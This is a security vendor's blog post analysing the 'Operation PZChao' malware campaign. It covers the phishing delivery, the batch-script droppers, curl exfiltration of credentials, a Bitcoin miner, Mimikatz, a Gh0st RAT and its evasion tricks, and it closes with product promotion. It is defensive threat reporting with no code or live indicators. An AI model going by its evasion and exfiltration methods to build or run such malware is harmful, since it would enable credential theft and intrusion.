Barkly vs Malware
Barkly Research
Feb 2018

New Data-Stealing, Cryptomining Malware Campaign on the Rise


A sophisticated malware campaign is infecting computers across the U.S. and Asia, dropping several payloads including a cryptominer, password stealers, and the Gh0st RAT trojan. Here's what you need to know.

Researchers at Bitdefender have unearthed a specialized multi-staged piece of malware that is spreading across Asia and the United States. Dubbed "Operation PZChao," the campaign appears to be focusing on organizations in the education, technology, government, and telecommunications sectors.   

Researchers believe the tactics, infrastructure, and payloads are reminiscent of previous campaigns executed by the notorious Chinese APT group Iron Tiger that dropped the Gh0st RAT trojan. Also referred to as “Emissary Panda” or “Threat Group-3390,” Iron Tiger has been active since 2010 and is suspected of conducting a variety of espionage campaigns in China and other countries in Asia.

The current PZChao campaign is believed to have been in active circulation since July 2017. The malware — delivered primarily via spear phishing emails — is quite complex, keying up a variety of functions for the attackers ranging from password stealing to complete remote access and control. Notably, it also drops a cryptocurrency mining component — making it part of a growing list of malware campaigns experimenting with cryptomining as an additional source of revenue.

How victims are getting infected

According to Bitdefender, delivery of the malware appears to be carried out via targeted spear phishing emails, which come in two flavors — the first contains a malicious VBS file attachment, while the second attaches a self-extracting 7zip file.

In both cases, the attachments serve as downloaders for subsequent payloads. The walkthrough below will focus on the 7zip attachment version of the attack, which takes an interesting approach to downloading/uploading data to and from attacker controlled servers. 

How the attack works


Operation PZChao attack diagram — Barkly provides defense-in-depth by blocking multiple stages of the attack.
Click to enlarge

Once executed, the self-extracting 7zip file drops two batch scripts (up.bat and new.bat), along with curl.exe, a legitimate application for transferring data (more on why that's important). 

The role of the ‘up.bat’ script is to rename the new.bat script to ‘win32shell.bat’, assign system file attributes, modify its access control list (ACL), and kill all scheduled tasks that might interfere with the attack.

The role of the ‘wins32shell.bat’ is multifaceted. Its first job is to act as a dropper for a batch script called ‘360.bat’ (named to masquerade as a popular security suite in China). Its second job is working with the files 360.bat and curl.exe to upload sensitive system information (eg: passwords) to the C2 server at ‘’. The script’s final task is to contact the download server at ‘’ to pull five additional payloads.

The stage two payloads are quite diverse and provide the attackers with several different avenues for translating their control over infected machines into profit. 

Payload 1: Bitcoin Miner

It's perhaps no surprise to anyone who's been following recent malware trends that the first payload dropped onto the infected machine is a cryptomining application. While the majority of the cryptomining malware we've seen has been geared to mine Monero (for an example, see our post on Digmine), this cryptominer is staying "oldschool" and mining Bitcoin. 

The miner application is run as java.exe. To help it evade detection and fly under the radar it's scheduled to mine only every three weeks at 3am. 

Payloads 2 and 3: Credential Stealers

In addition to mining Bitcoin, the attackers are also after victim credentials, which they attempt to extract using an implentation of Mimikatz. 

The malware deploys two versions (pass32, pass64) of the Mimikatz implementation to run specifically on both x86 and x64 architectures. These are executed by the 360.bat script and once credentials are collected they get uploaded to the C2 server via curl.exe.

Payload 4: Gh0st RAT

The last payload downloaded is a modified version of the Gh0st remote administration tool (RAT). This application contains all the code required to install the RAT server service. Once the service is installed, the system becomes completely compromised and the attacker is given the following capabilities:

  • Listing of all active processes and opened windows
  • Real-time and offline remote keystroke logging
  • Remote listening of conversations via microphone
  • Eavesdropping on webcams' live video feed
  • Full access to remote shell and reboot of the system
  • Ability to download binaries from the Internet
  • Complete file explorer capabilities


Payload 5: Port Scanning tools

In addition to these primary payloads, the server is also hosting port scanning applications, which can be used by the attackers to probe the victim's network for additional vulnerable systems and opportunities for lateral movement. 

Evading detection at the network level

The hacking group behind this campaign has control over at least five malicious subdomains of the domain. Each of these subdomains provides a specific functionality (ex: upload, download, RAT actions, malware DLL delivery).

The trojan’s continuous rotation of the C&C server helps it evade detection at the network level. Another trick that helps the malware stay under the radar is changing the C&C address to localhost when the attacker is not using the infrastructure.

A sign of more attacks to come?

According to the researchers, although the tools used in this particular attack are a few years old, they are battle-tested and primed for deployment in future campaigns. In particular, use of Gh0st RAT variants previously utilized by the Iron Tiger APT group suggests this may be a new campaign operated by experienced and advanced attackers who were previously very active. If that's the case, organizations need to be prepared to face similar attacks in the near future.

With this trojan packing so many post-exploitation capabilities (data exfiltration, cryptocurrency mining, complete remote control, etc.), the emphasis needs to be on blocking attacks as early in the attack chain as possible — ideally preventing infection in the first place. 

That's exactly the approach Barkly takes to blocking this threat by preventing the initial self-extracting 7zip attachment from fully executing. While that effectively nips the attack in the bud, we've also tested each payload and confirmed Barkly provides additional defense in depth by blocking each of those, as well. 


Barkly blocks the initial 7zip self-extracting file as well as each of the attack's payloads.

Learn more about Barkly's unique approach to protection and find out how it covers critical gaps in antivirus coverage by downloading our AV Gap Analysis.  

For more practical tips on how to protect your company against this and other modern attacks, see our 2018 Cybersecurity Checklist



7zip self-extracting file:


Miner (java.exe):


Gh0st RAT:




Port scanner:



Barkly Research

Barkly Research

Barkly's malware research team is hard at work stopping new malware that sneaks past antivirus.


Close the gaps in your security

Stop paying for AV, get the strongest protection instead. See how Barkly blocks attacks that are getting past AV.

See a demo


Stay informed!

Get the latest security news, tips, and trends straight to your inbox.

Stay informed!

Get the latest security news, tips, and trends straight to your inbox.